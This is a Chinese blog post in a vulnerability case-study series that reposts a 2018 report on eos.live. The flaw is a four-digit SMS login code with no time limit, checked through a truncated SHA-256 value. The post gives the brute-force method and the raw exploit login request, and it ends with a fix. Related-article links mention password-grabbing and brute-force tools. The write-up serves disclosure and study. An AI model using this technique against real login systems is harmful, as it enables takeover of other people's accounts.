【漏洞学习】DVP-2018-08529(绕过加密登陆任意用户)

最新推荐文章于 2021-07-14 09:21:05 发布
最新推荐文章于 2021-07-14 09:21:05 发布
阅读量224 收藏
点赞数
分类专栏: # DVP漏洞案例学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/86503217
版权

漏洞URL:https://eos.live/

简要描述:验证码4位数没时间限制 sha256加密截取的4个字符 脚本加密截取即可

漏洞证明:

https://eos.live/

手机验证码登录4位数

这里验证码是加密的 0000是 b336

看了js是sha256加密 截取字符串第五位数开始截取4个字符

解密0000正好是b336

写个脚本循环0000-9999 然后sha256加密 再截取第五位数开始截取4个

php脚本

把加密截取出来的4个字符导入文本去爆破 成功登录

漏洞利用代码:

POST /v1/user/login HTTP/1.1
Host: eos.live
Connection: close
Content-Length: 114
Accept: application/json, text/plain, */*
Origin: https://eos.live
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://eos.live/user/saozhu
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1334098644.1535605506; _gid=GA1.2.1939758515.1535605506; connect.sid=s%3A2UBa2wYv9kPj9axP584NX4NCx1rT9Ha3.VD0FMlk85%2BkFrGxQBn9S5Miu55ogO86sabYBpmYYJZM

{"username":"","mobile":"+86130xxxxxxxx","smscode":"3543","ucode":"3582201127","captchatext":"f397","password":""}

修复方案:

6位数验证码时间限制

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
dvp-pm_1023_dvp-pm_1023_
09-29
【标题】"dvp-pm_1023_dvp-pm_1023_" 概述 这个名为 "dvp-pm_1023_dvp-pm_1023_" 的程序看起来是一个专门针对DVP-PM系列可编程控制器(PLC)的应用工具或固件更新包。DVP-PM可能是台达电子(Delta Electronics)的...
密码安全论
Fly_鹏程万里
10-30 760
前言 目前大多数网站都提供了用户的登录注册功能模块,而在这些模块当中,用户的密码常常会成为一个攻击的脆弱点,例如:弱口令(12345,123456,1234567890,admin,admin123,admin888等等),也有一些是因为爆破风险,例如:密码采用生日、常用的网络用语等较为简单的密码,同时未对单一IP某一时间段内的最大请求登录次数做限制或图片验证码前端校验等等,导致爆破的可能性。 ...
密码抓取
Fly_鹏程万里
04-28 2465
功能:一键抓取电脑中的聊天、浏览器、内存、 databases、邮件、wifi、钱包等各种登录密码。平台:支持Win,Linux,Mac系统适合用在信息搜集方面。Github项目代码:https://github.com/AlessandroZ/LaZagne 该项目已作为后期开发模块添加到pupy中。Python代码将在内存中解释,而不会触及磁盘,它可以在Windows和Linux主机上运...
session及cookie问题
weixin_47724586的博客
09-13 415
session及cookie问题 1.当用户登录成功时,会在服务器中创建一个session,session中保存客户端和服务器的连接唯一标识connect-sid, 2.当服务器返回数据时会把字段名叫set-cookie,字段值叫connect-sid的字段放在响应头中 3.客户端接受信息时会检测响应头中是否存在set-cookie字段,如果存在会把字段里的值放到浏览器的cookie中 4.下次客户端发送请求时会把浏览器中cookie的connect-sid放到请求头中。 5.当我们在当前域发送接口时会自动
express-session在浏览器中存的connect.sid加密过的
飞翔的熊blabla
11-28 1804
以下文章中涉及的算法可能已经更改,但是流程/原理是差不多的https://cnodejs.org/topic/55c37de8b98f51142b367aba 若本次cookie中没有connect.sid,则生成一个 [用secret生成connect.sid] 用uid-safe生成一个唯一id,记为sessionid,保证每次不重复; 把上面的connect.sid制作成 's:' +...
CTF/CTF练习平台-各种绕过哟【sha1数组类型比较漏洞
Sp4rkW的博客
09-14 9599
原题内容: 各种绕过哟 http://120.24.86.145:8002/web7/ 吐槽一下,,,提示真的恶心,,误导 还好有印象对sha1,具体漏洞信息可见我的博客SHA1/MD5/URLDECODE 在php审计题中的一般思路(积累中) 以前总结过,没做过题目,今天算是遇到了,,,mark一下 一张图解释做题思路 ...
DVP-EH-数字量模块
03-15
标题“DVP-EH-数字量模块”和描述“介绍了关于DVP-EH-数字量模块的详细说明,提供台达PLC的技术资料的下载”所涉及的知识点主要集中在台达电子(Delta Electronics)推出的DVP-EH系列数字量模块,这是台达PLC(可编程...
台达PLC_DVP-ES2系列选型手册.pdf
12-25
【台达PLC_DVP-ES2系列选型手册】是针对台达自动化产品线中的DVP-ES2系列可编程控制器的详细指南,旨在帮助用户进行正确的型号选择和应用设计。DVP-ES2系列作为小型PLC,集成了先进的技术和创新功能,适用于各种工业...
基于DVP-M的LCD TV系统
08-31
综上所述,基于DVP-M的LCD TV系统结合了先进的硬件组件和精心设计的软件架构,实现了高效、灵活的信号处理和用户友好的交互体验。这个系统不仅展示了LCD TV技术的卓越性能,还突显了数字化处理芯片在电视系统中的...
浅谈常用视频加密原理及加密的几种应用形式
cili1688的博客
06-26 1913
一、视频加密 视频加密是对某些自有版权的视频进行加密处理,用户只有在一定的条件下才能获得视频的观看权。比如对于教育视频加密后,只有学员才能观看,每个学员都有自己的唯一账号。或者说设定在一定的时间内可以无限次观看...
Bugku——sha()函数比较绕过
王嘟嘟的博客
11-01 1552
0x00 前言 有点静不下心,所以做做ctf的题目。 题目 0x01 Start <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo " "; var_dump($_GET['password']); var_dump(sh
SHA256加密之显示明文密码的处理方法
一个人的博客
06-15 3万+
不过如果你是开发人员,那么你是可以做一些处理的,因为SHA256加密后是256位,也就是64个字符,所以可以从这里下手。解决方法就是将密码隐藏到加密后的密文中,你可以设置一套只有自己知道的排序方式,那么当你要解密后,你就可以通过自己的这套排序方式将密码"挖"出来!这样的处理方法确实显得有点草率,不过确实是解决了我的问题,不过安全系数比较低。所以可以再复杂一点,原理也就是将密码拆开成字符,按照一定的规则插入到密文中,解密的话就按照这样的规则取字符拼接就行了。写的有点复杂,逻辑有一点乱,不过还是能用的!
超级计算机能破解sha256,无需工具软件,校验文件MD5、SHA1、SHA256值
weixin_31599065的博客
07-14 1441
原创:张荣国刚有个朋友问我,他下载了个iso,看网上说要验证sha256值,但是上面说的工具软件,他网上没找到,问我能找到吗。我听了笑笑的说,验证sha256值还要什么工具软件啊,直接命令行就行了。网上的还真是误导又浪费时间,要下载,要安装,还占用硬盘空间,真奇葩。那么我说说怎么命令行查询文件MD5、SHA1、SHA256值Windows 系统下校验文件的SHA256打开 cmd 窗口,使用cer...
HackTools————8、暴力破解FTP登录选项
Fly_鹏程万里
04-06 1653
思路主要还是使用FTP用户名与密码字典对FTP进行登录的破解具体的代码如下:#encoding:utf-8 import ftplib def brutelogin(hostname,passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): userName=line.split(':')[0]...
【信息收集】——3、信息收集指南
热门推荐
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
逻辑漏洞之密码重置
Fly_鹏程万里
06-01 1765
密码找回验证条件可社工1 只验证帐号是否存在即可修改密码2 只验证帐号与邮箱地址是否匹配即可修改密码3 只验证帐号与手机号是否匹配即可修改密码密码修改页面可预测案例介绍: 问题出现在忘记密码处,可以通过手机找回和邮箱找回密码两种方式获得指定帐户的新密码设置权限进入忘记密码,填写想要获取权限帐号的ID获得url选择邮箱找回获得url:系统已将新密码设置url发送给邮箱此时只需要将前面获取的url修改...
CTF-Web2-(简单绕过登录过滤)
→_→
07-14 1万+
登陆一下好吗?? 做CTF题时,不要忽略任何信息,要先收集信息,再分解信息,对于出题者的信息,不可全信,也不可不信,具体的来说就是要仔细分析,出题者的意图。 那么,根据这一题的信息,我们了解到这是一道过滤了某些字符的登录注入题型,为了进一步了解点击链接开始答题: 打开链接,我们就能看到一个很简单的一个登录页面,我们可以按F12查看前端代码,看是否有隐藏的信息,结果没有,接下来我们就要考虑给出的信息中提到过滤了一切,我们测试一下,看是否过滤了所有的字符: 点击登录: 从返回的信息.
DVP-5000M硬件系列用户手册:北京德威特电力保护监控装置
"DVP-5000M(V0100)使用说明书提供的是北京德威特电力系统自动化有限公司的硬件系列用户使用手册,主要涵盖了DVP-5000M家族的多种微机保护监控装置,如变压器、线路、电容器、母联、进线、电动机以及PT监控等设备的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值